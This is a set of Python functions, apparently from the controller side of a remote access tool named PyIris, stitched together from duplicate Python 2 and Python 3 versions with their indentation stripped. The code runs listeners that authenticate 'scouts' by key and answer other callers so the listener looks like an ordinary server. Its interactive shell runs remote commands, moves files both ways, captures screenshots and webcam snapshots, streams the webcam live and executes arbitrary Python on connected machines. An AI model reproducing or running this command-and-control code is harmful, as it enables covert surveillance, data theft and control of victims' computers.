def main(scout_id):
try:
slp_scout_id = scout_id.split(' ', 2)[1]
sleep_dur = scout_id.split(' ', 2)[2]
if slp_scout_id == 'all':
for i in list(config.scout_database.keys()):
try:
print(config.inf + 'Sleeping scout of ID : ' + i)
send_all.main(config.scout_database[i][0],
'sleep ' + sleep_dur)
data = recv_all.main(config.scout_database[i][0])
print(data)
del (config.scout_database[i])
except socket.error:
print(config.neg +
'Scout is dead, removing from database...')
del (config.scout_database[i])
else:
send_all.main(config.scout_database[slp_scout_id][0],
'sleep ' + sleep_dur)
data = recv_all.main(config.scout_database[slp_scout_id][0])
print(data)
del (config.scout_database[slp_scout_id])
except KeyError:
print(config.neg + 'Please enter a valid scout ID')
return
except IndexError:
print(config.neg + 'Please enter valid arguments')
except socket.error:
print(config.neg + 'Scout is dead, removing from database...')
del (config.scout_database[scout_id])
def main(scout_id):
try:
scout_id = scout_id.split(' ', 1)[1]
if scout_id == 'all':
for i in list(config.scout_database.keys()):
try:
print(config.inf + 'Pinging scout of ID : ' + i)
send_all.main(config.scout_database[i][0], 'ping')
data = recv_all.main(config.scout_database[i][0])
if not data:
raise socket.error
print(data)
except socket.error:
print(config.neg +
'Scout is dead, removing from database...')
del (config.scout_database[i])
else:
send_all.main(config.scout_database[scout_id][0], 'ping')
data = recv_all.main(config.scout_database[scout_id][0])
print(data)
except (IndexError, KeyError):
print(config.neg + 'Please enter a valid scout ID')
return
except socket.error:
print(config.neg + 'Scout is dead, removing from database...')
del (config.scout_database[scout_id])
def main(scout_id):
try:
send_all.main(config.scout_database[scout_id][0], 'ping')
data = recv_all.main(config.scout_database[scout_id][0])
print(data)
return True
except socket.error:
print(config.neg + 'Scout is dead, removing from database...')
del (config.scout_database[scout_id])
return False
def main(sock):
print(config.inf + 'Waiting for raw webcam pickle to arrive')
raw_bytes = recv_all.main(sock)
file_name = datetime.now().strftime('%Y-%m-%d_%H-%M-%S.png')
if type(raw_bytes) is str:
print(raw_bytes)
elif type(raw_bytes) is bytes:
img = pickle.loads(raw_bytes)
img.save(file_name, 'PNG')
print(config.pos + 'Wrote file to : ' + os.path.join(os.getcwd(), file_name))
print(config.pos + 'Done')
def main(sock):
print '[*]Waiting for raw webcam pickle to arrive'
raw_bytes = recv_all.main(sock)
file_name = datetime.now().strftime('%Y-%m-%d_%H-%M-%S.png')
if raw_bytes.startswith('[!]Error in scout : '):
print raw_bytes
else:
img = pickle.loads(raw_bytes)
img.save(file_name, 'PNG')
print '[+]Wrote file to : ' + os.path.join(os.getcwd(), file_name)
print '[+]Done'
def main(sock):
print config.inf + 'Waiting for raw screenshot data to arrive'
raw_bytes = recv_all.main(sock)
file_name = datetime.now().strftime('%Y-%m-%d_%H-%M-%S.png')
if raw_bytes.startswith(config.war + 'Error in scout : '):
print raw_bytes
else:
with open(file_name, 'wb') as f:
f.write(raw_bytes)
print config.pos + 'Wrote file to : ' + os.path.join(
os.getcwd(), file_name)
print config.pos + 'Done'
def main(sock):
print(config.inf + 'Waiting for raw screenshot data to arrive')
raw_bytes = recv_all.main(sock)
file_name = datetime.now().strftime('%Y-%m-%d_%H-%M-%S.png')
if type(raw_bytes) == str:
print(raw_bytes)
else:
with open(file_name, 'wb') as f:
f.write(raw_bytes)
print(config.pos + 'Wrote file to : ' +
os.path.join(os.getcwd(), file_name))
print(config.pos + 'Done')
def main(sock):
print(config.inf + 'Streaming clients webcam, press "q" in the live stream window to exit')
message = recv_all.main(sock)
if message != '[+]Successfully opened camera!':
print(message)
return
print(message)
while True:
data = recv_all.main(sock)
if type(data) == str:
print(data)
return
else:
frame = pickle.loads(data)
cv2.imshow('Live stream', frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
send_all.main(sock, "1")
cv2.destroyAllWindows()
print(recv_all.main(sock))
break
send_all.main(sock, "0")
def main(sock):
print '[*]Waiting for raw screenshot data to arrive'
raw_bytes = recv_all.main(sock)
file_name = datetime.now().strftime('%Y-%m-%d_%H-%M-%S.png')
if raw_bytes.startswith('[!]Error in scout : '):
print raw_bytes
else:
f = open(file_name, 'wb')
f.write(raw_bytes)
f.close()
print '[+]Wrote file to : ' + os.path.join(os.getcwd(), file_name)
print '[+]Done'
def main(scout_id, timeout=5):
bytes_flushed = 0
while True:
try:
data = recv_all.main(config.scout_database[scout_id][0], timeout)
if len(data) == 0:
break
bytes_flushed += len(data)
except (socket.error, socket.timeout):
break
print(config.pos + 'Flushed ' + str(bytes_flushed) +
' bytes from scout socket')
def main(sock):
try:
print config.inf + 'Receiving data...'
pickle_data = recv_all.main(sock)
data = pickle.loads(pickle_data)
print config.pos + 'Done, writing file...'
name = basename(data[0])
contents = data[1]
with open(name, 'wb') as f:
f.write(contents)
print config.pos + 'Downloaded file : ' + name
except (TypeError, KeyError):
print pickle_data
except Exception as e:
print config.neg + 'Error while downloading file : ' + str(e)
def main(sock):
try:
print '[*]Receiving data...'
pickle_data = recv_all.main(sock)
data = pickle.loads(pickle_data)
print '[+]Done, writing file...'
name = basename(data[0])
contents = data[1]
f = open(name, 'wb')
f.write(contents)
f.close()
print '[+]Downloaded file : ' + name
except (TypeError, KeyError):
print pickle_data
except Exception as e:
print '[-]Error while downloading file : ' + str(e)
def main(sock):
try:
print(config.inf + 'Receiving data...')
data = recv_all.main(sock).split(' ')
if data[0].startswith('[-]') or data[0].startswith('[!]'):
print (' '.join(data))
return
print(config.pos + 'Done, writing file...')
name = basename(' '.join(data[:-1]))
contents = b64decode(data[-1])
with open(name, 'wb') as f:
f.write(contents)
print(config.pos + 'Downloaded file : ' + name)
except (TypeError, KeyError):
print(data)
except Exception as e:
print(config.neg + 'Error while downloading file : ' + str(e))
def main(sock, filepath):
try:
filepath = filepath.split(' ', 1)[1]
print(config.inf + 'Reading file...')
with open(filepath, 'rb') as f:
data = f.read()
print(config.inf + 'Sending file data to scout...')
sock.sendall(('upload ' + basename(filepath) + ' ' +
b64encode(data).decode()).encode())
response = recv_all.main(sock)
print(response)
except IOError:
print(config.neg + 'File does not exist, cannot upload')
except IndexError:
print(config.neg +
'Please supply valid arguments for the command you are running')
except Exception as e:
print(config.neg + 'Error while uploading file : ' + str(e))
def main(args):
try:
host = args.split(' ')[1]
port = int(args.split(' ')[2])
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(2)
s.connect((host, port))
print(config.pos + 'Established a TCP connection to ' + host + ':' + str(port))
if config.white_list:
if host not in config.white_list:
s.close()
print(config.neg + 'Connection was aborted because host was not in whitelist')
return
elif config.black_list:
if host in config.black_list:
s.close()
print(config.neg + 'Connection was aborted because host was in blacklist')
return
s.settimeout(5)
try:
await_key = recv_all.main(s)
except (socket.timeout, socket.error):
print(config.neg + 'Established connection to ' + host + ':' + str(port) + ' but no data received!')
return
s.settimeout(None)
if await_key == config.key:
print(config.pos + 'Key from scout matches, connection is allowed')
config.scout_database[str(config.incremented_scout_id)] = [s, host, str(port),
host + ':' + str(port),
return_random_string.main(5),
datetime.now().strftime(
'%Y-%m-%d %H:%M:%S'),
'Bind']
print(config.inf + 'Entry added to database')
config.incremented_scout_id += 1
else:
print(config.neg + 'Invalid key was supplied from scout, denying connection...')
s.close()
except (socket.timeout, socket.error):
print(config.neg + 'Unable to establish bind TCP connection to ' + host + ':' + str(port))
except (IndexError, ValueError):
print(config.neg + 'Please specify a valid hostname and port number')
def main(sock, filepath):
try:
filepath = filepath.split(' ', 1)[1]
print config.inf + 'Reading file...'
print config.inf + 'Initiating file upload with scout...'
sock.sendall('upload')
time.sleep(3)
with open(filepath, 'rb') as f:
data = f.read()
pickle_data = pickle.dumps([basename(filepath), data])
print config.pos + 'Done, uploading file...'
sock.sendall(pickle_data)
response = recv_all.main(sock)
print response
except IOError:
print config.neg + 'File does not exist, cannot upload'
except IndexError:
print config.neg + 'Please supply valid arguments for the command you are running'
except Exception as e:
print config.neg + 'Error while uploading file : ' + str(e)
def main(sock, filepath):
try:
filepath = filepath.split(' ', 1)[1]
print '[*]Reading file...'
f = open(filepath, 'rb')
print '[*]Initiating file upload with scout...'
sock.sendall('upload')
time.sleep(3)
data = f.read()
f.close()
pickle_data = pickle.dumps([basename(filepath), data])
print '[+]Done, uploading file...'
sock.sendall(pickle_data)
response = recv_all.main(sock)
print response
except IOError:
print '[-]File does not exist, cannot upload'
except IndexError:
print '[-]Please supply valid arguments for the command you are running'
except Exception as e:
print '[-]Error while uploading file : ' + str(e)
def main():
try:
confirm_exit = input('\n' + config.pro + 'Are you sure you want to exit[y/n] : ')
if confirm_exit == 'y':
print(config.inf + 'User requested shutdown...')
if config.listener_database:
print(config.lod + 'Killing all active listeners')
print(config.inf + 'Sent kill message to all listeners...')
print(config.inf + 'Waiting for response...')
config.listener_database = {}
while threading.active_count() > 1:
continue
print(config.pos + 'Done')
if config.scout_database:
print(config.lod + 'Disconnecting all scouts')
for i in config.scout_database:
try:
send_all.main(config.scout_database[i][0], 'disconnect')
config.scout_database[i][0].settimeout(5)
buffer_out_reply = recv_all.main(config.scout_database[i][0])
config.scout_database[i][0].close()
print(config.pos + 'Closed connection to scout of ID : ' + i)
except (socket.error, socket.timeout):
print(config.neg + 'Could not close connection to scout of ID : ' + i)
pass
print(config.pos + 'Done')
print(config.pos + 'Exiting...')
os._exit(1)
else:
pass
except EOFError:
try:
time.sleep(2)
quit()
except KeyboardInterrupt:
quit()
except KeyboardInterrupt:
quit()
def main(scout_id):
try:
scout_id = scout_id.split(' ', 1)[1]
scout_prompt = config.scout_database[scout_id][
1] + ':' + config.scout_database[scout_id][2]
print '[+]Bridged to : ' + scout_id
except (IndexError, KeyError):
print '[-]Please enter a valid scout ID'
return
while True:
try:
prompt = raw_input('PyIris (Scout@' + scout_prompt +
') > ').strip()
command = prompt.split(' ', 1)[0]
if command == 'back':
print '[*]Returning to scout interface...'
return
elif command == 'clear':
clear.main()
elif command == 'disconnect':
print send_and_recv.main(prompt, scout_id)
del (config.scout_database[scout_id])
print '[*]Returning...'
return
elif command in ('?', 'help'):
help.main('direct', prompt)
elif command == 'kill':
print send_and_recv.main(prompt, scout_id)
del (config.scout_database[scout_id])
print '[*]Returning...'
return
elif command in ('!', 'local'):
local.main(prompt)
elif command == 'main':
print '[*]Returning to scout interface...'
return 'home'
elif command == 'python':
python.main()
elif command == 'quit':
quit.main()
elif command == 'sleep':
data = send_and_recv.main(prompt, scout_id)
print data
if data.startswith('[*]'):
del (config.scout_database[scout_id])
print '[*]Returning...'
return
elif command == 'download':
config.scout_database[scout_id][0].sendall(prompt)
download.main(config.scout_database[scout_id][0])
elif command == 'upload':
upload.main(config.scout_database[scout_id][0], prompt)
elif command == 'screen':
config.scout_database[scout_id][0].sendall(command)
screen.main(config.scout_database[scout_id][0])
elif command == 'webcam_snap':
config.scout_database[scout_id][0].sendall(command)
webcam_snap.main(config.scout_database[scout_id][0])
elif command == 'ping':
ping.main(prompt)
elif not command:
pass
else:
config.scout_database[scout_id][0].sendall(prompt)
data = recv_all.main(config.scout_database[scout_id][0])
print data
# print '[-]Invalid command, run "help" for help menu'
except EOFError:
try:
time.sleep(2)
except KeyboardInterrupt:
quit.main()
except KeyboardInterrupt:
quit.main()
except (socket.error, socket.timeout):
print '[-]Scout has unexpectedly died, removing from database...'
del (config.scout_database[scout_id])
return
def main(host, port, name, reply):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, port))
s.listen(1)
s.settimeout(2)
local_copy_of_id = config.incremented_listener_id
config.listener_database[str(config.incremented_listener_id)] = [
host,
str(port), name,
datetime.now().strftime('%Y-%m-%d %H:%M:%S'), []
]
config.incremented_listener_id += 1
print(config.pos + 'Successfully started listener thread at : ' +
host + ':' + str(port))
while True:
try:
if should_listener_die.main(str(local_copy_of_id)):
print('\n' + config.pos + 'Listener at : ' + host + ':' +
str(port) + ' , received kill message, exiting...')
return
else:
try:
conn, addr = s.accept()
except (socket.timeout, socket.error):
continue
if config.white_list:
if addr[0] not in config.white_list:
conn.sendall(
reply.encode()
) # masquerade as ordinary server without showing length byte and seperator
conn.close()
continue
elif config.black_list:
if addr[0] in config.black_list:
conn.sendall(
reply.encode()
) # masquerade as ordinary server without showing length byte and seperator
conn.close()
continue
if conn:
await_key = recv_all.main(conn, 5)
conn.settimeout(None)
if await_key == config.key:
print('\n' + config.pos +
'Connection received from scout : ' +
addr[0] + ':' + str(addr[1]) + ' -> ' +
host + ':' + str(port))
config.scout_database[str(
config.incremented_scout_id)] = [
conn, addr[0],
str(addr[1]), host + ':' + str(port),
return_random_string.main(5),
datetime.now().strftime(
'%Y-%m-%d %H:%M:%S'), 'Reverse'
]
config.listener_database[str(
local_copy_of_id)][4].append(addr[0] + ':' +
str(addr[1]))
config.incremented_scout_id += 1
else:
conn.sendall(
reply.encode()
) # masquerade as ordinary server without showing length byte and seperator
conn.close()
else:
conn.close()
except socket.error:
continue
except Exception as e:
print('\n' + config.war + 'Error in listener thread : ' + str(e) +
', killing thread...')
try:
del (config.listener_database[str(local_copy_of_id)])
except (IndexError, ValueError, UnboundLocalError):
pass
def main(scout_id):
readline.parse_and_bind('tab: self-insert')
try:
scout_id = scout_id.split(' ', 1)[1]
scout_prompt = config.scout_database[scout_id][
1] + ':' + config.scout_database[scout_id][2]
print(config.pos + 'Bridged to : ' + scout_id)
except (IndexError, KeyError):
print(config.neg + 'Please enter a valid scout ID')
return
while True:
try:
prompt = input('\x1b[1m\x1b[37mPyIris (\x1b[0m\x1b[1m\x1b[31m' +
'Scout\x1b[0m' +
'\x1b[1m\x1b[37m@\x1b[0m\x1b[1m\x1b[31m' +
scout_prompt +
'\x1b[0m\x1b[1m\x1b[37m) > \x1b[0m').strip()
command = prompt.split(' ', 1)[0].lower()
if command == 'back':
print(config.inf + 'Returning to scout interface...')
return
elif command == 'clear':
clear.main()
elif command == 'disconnect':
print(send_and_recv.main(prompt, scout_id))
del (config.scout_database[scout_id])
print(config.inf + 'Returning...')
return
elif command == 'kill':
print(send_and_recv.main(prompt, scout_id))
del (config.scout_database[scout_id])
print(config.inf + 'Returning...')
return
elif command in ('!', 'local'):
local.main(prompt)
elif command == 'main':
print(config.inf + 'Returning to scout interface...')
return 'home'
elif command == 'python':
python.main()
elif command == 'quit':
quit.main()
elif command == 'sleep':
data = send_and_recv.main(prompt, scout_id)
print(data)
if data.startswith('[*]'):
del (config.scout_database[scout_id])
print(config.inf + 'Returning...')
return
elif command == 'download':
send_all.main(config.scout_database[scout_id][0], prompt)
download.main(config.scout_database[scout_id][0])
elif command == 'upload':
upload.main(config.scout_database[scout_id][0], prompt)
elif command == 'screen':
send_all.main(config.scout_database[scout_id][0], command)
screen.main(config.scout_database[scout_id][0])
elif command == 'webcam':
send_all.main(config.scout_database[scout_id][0], command)
webcam.main(config.scout_database[scout_id][0])
elif command == 'ping':
alive_bool = ping.main(scout_id)
if not alive_bool:
print(config.inf + 'Returning...')
return
elif command == 'exec_py_script':
data = 'exec_py ' + python_execute_editor.main()
print(config.inf + 'Attempting to run on scout...')
print(send_and_recv.main(data, scout_id))
elif command == 'exec_py_file':
python_execute_file.main(prompt, scout_id)
elif command == 'inj_valid':
print('\n' + config.inf +
'All valid keys that can be injected : \n')
formatted = grid_format.main(valid_keys, 5)
for i in formatted:
print(' ' + ''.join(i))
print('\n')
elif not command:
pass
else:
send_all.main(config.scout_database[scout_id][0], prompt)
data = recv_all.main(config.scout_database[scout_id][0])
print(data)
except EOFError:
try:
time.sleep(2)
except KeyboardInterrupt:
quit.main()
except KeyboardInterrupt:
quit.main()
except (socket.error, socket.timeout):
print(config.neg +
'Scout has unexpectedly died, removing from database...')
del (config.scout_database[scout_id])
return
except IndexError:
print(
config.neg +
'Please supply valid arguments for the command you are running'
)
def main(data, scout_id):
config.scout_database[scout_id][0].sendall(data)
data = recv_all.main(config.scout_database[scout_id][0])
return data
